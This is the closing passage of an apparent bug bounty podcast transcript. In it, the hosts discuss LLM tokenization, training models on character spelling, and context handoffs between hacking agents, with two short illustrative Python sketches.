But yeah, definitely, definitely interesting. And I think, going back to the human thinking versus AI thinking, I definitely don't know enough about that to make a conjecture. But I do think that, like you said, it affects the granularity of what the AIs can output. And perhaps I'm misconstruing how human neural networks work, but I think that a deeper understanding, like a conceptual understanding, of what a character is and what a character string looks like is something that differentiates us. And as I'm saying that, I'm also realizing, though, that as a beginner, you think about an XSS payload as an XSS payload, not as an image tag and a source attribute, and, you know, an invalid source attribute and an onerror attribute. So that's exactly what beginner hackers are doing when they're copying and pasting these XSS payloads: they consider it one token, rather than having a deeper, character-level understanding of that specific payload.
[00:31:55.32] - Joseph Thacker
I know you've only got one minute, but I had that exact same thought. I thought about how you could plug the hole of tokenization, character by character. Imagine getting a whole bunch of conversations, like simulated conversations, you know how they do training on back-and-forth conversations. Imagine if there was a bunch of fake conversations between me and an AI, or you and an AI, or whatever, where it was basically quizzing it on characters. So basically, what I'm trying to say is, I wonder, if we gave these top AI models a whole bunch of content about what a character is and how it's different from, like, the word. Like, for example: what are the characters in the word strawberry? And it was expected to respond S, T, R, A, W, B, E, and so on. If we gave it like a trillion examples of those and threw that into the training set, would it develop its own sense of what a character is, in such a way that would improve the output? I actually genuinely think that could work. But anyways, it was just a thought I had.
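A toy version of that training-data idea; the conversation format, filename, and word list are purely illustrative.

```python
# Generate endless "spell this word" examples so a model could, in theory,
# learn a character-level view of its tokens, per Joseph's suggestion.
import json
import random

WORDS = ["strawberry", "tokenization", "magikarp", "vulnerability"]

def spelling_example(word: str) -> dict:
    return {
        "messages": [
            {"role": "user",
             "content": f"What are the characters in the word '{word}'?"},
            {"role": "assistant",
             "content": ", ".join(word.upper())},  # "S, T, R, A, W, ..."
        ]
    }

with open("char_quiz.jsonl", "w") as f:
    for _ in range(1000):  # Joseph says "a trillion"; a thousand for the sketch
        f.write(json.dumps(spelling_example(random.choice(WORDS))) + "\n")
```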
[00:32:54.67] - Justin Gardner
Very interesting. Dude. Okay, like you said, I do have a hard stop, and I might throw you to the wolves here a little bit, Joseph, but I think the concept you gave me about context engineering is really interesting. So I don't know if you want to talk about that. Richard can bleep it if you don't want to. But if you felt like it, you could spend a couple of minutes just sort of explaining how difficult that problem is and how relevant it is to hackers. Or we can cover it a different time. Either way.
[00:33:20.53] - Joseph Thacker
Cool. Do you have something to say for it or are you going to drop?
[00:33:22.50] - Justin Gardner
No, I'm going to. I got to bounce.
[00:33:23.61] - Joseph Thacker
Okay, cool. I'll describe it. All right.
[00:33:25.66] - Justin Gardner
You got it, man.
[00:33:26.25] - Joseph Thacker
All right. Yeah. So me and Justin, before we hopped on the air, were talking about what I'm calling context engineering. It came out of a blog post from Hrishi, but also the founder of LangChain, Harrison Chase, was talking about context engineering and how it's going to be really important. Basically, if you imagine AI as this bleeding-edge technology, then the way in which you develop and make, what are they called, agents, like, this is kind of the year of agents, is the bleeding-edge technology on top of AI. So we have agentic behavior, and then on top of that there are sub-agents, and how do you hand over context from some agents to other agents? That's what Hrishi posted about. We may talk about this in a future episode, but Hrishi Olickel is the best wielder of AI, in my opinion. And he wrote a blog post all about how he was reversing the minified JS of Claude Code from Anthropic, which is like, oh, hackers want to do that all the time. So I think that'd be really interesting. And so I shared it in the Critical Thinkers chat multiple times. But in there he calls these intermediates. It's basically the information that you have to hand off to get a task done. And his kind of three examples are: you sometimes have to hand off information to yourself, when you go to work on the same project the next day, right, and that's the easiest form of handoff. Then the next step up is you're handing it off to someone who also knows the project and the company really well. And then the next step up is handing it to someone who doesn't know it well, or to an AI system that doesn't have all the context of your company or your life or all the things that are going on. And so I think that's pretty interesting. And it's basically: how do you manage context between agents? I think that's going to be really, really key from a hackbot perspective as well. Right? Because you may have a core hackbot that hands off something to a sub-agent, and it doesn't pass back enough context for the core agent to really make a true validation of whether or not what the sub-agent found is a true positive or a false positive. And so anyways, that's just a cool, hard problem to solve, and Justin thought it was really neat, and I think it's something we should all be leaning into and looking into. Super thankful for y'all's time and attention, and I hope that you enjoyed the episode, and we'll see you in another week.
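A rough sketch of that handoff problem, with an invented structure rather than any real framework's API: the point is that a sub-agent has to pass back enough evidence for the core agent to judge true versus false positive at all.

```python
# Hypothetical shape for an agent-to-agent context handoff in a hackbot.
from dataclasses import dataclass

@dataclass
class Handoff:
    finding: str                # e.g. "reflected XSS in /search?q="
    evidence: list[str]         # raw request/response pairs, screenshots, etc.
    steps_taken: list[str]      # what the sub-agent tried and why
    open_questions: list[str]   # what it could NOT verify

def core_agent_judges(h: Handoff) -> str:
    # A real core agent would pass this to a model; here we just gate on
    # whether the handoff carries enough evidence to decide at all.
    if not h.evidence or h.open_questions:
        return "insufficient context -- send back to sub-agent"
    return "ready for human-in-the-loop review"

h = Handoff(
    finding="reflected XSS in /search?q=",
    evidence=["req/resp pair", "headless-browser screenshot of alert()"],
    steps_taken=["fuzzed q with polyglots", "confirmed no CSP on the page"],
    open_questions=[],
)
print(core_agent_judges(h))
```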
[00:35:48.98] - Justin Gardner
And that's a wrap on this episode of Critical Thinking. Thanks so much for watching to the end, y'all. If you want more Critical Thinking content, or if you want to support the show, head over to the CTBB Discord. You can hop in the community. There's lots of great high-level hacking discussion happening there, on top of the masterclasses, hack-alongs, exclusive content, and a full-time hunters guild if you're a full-time hunter. It's a great time, trust me. All right, I'll see you there.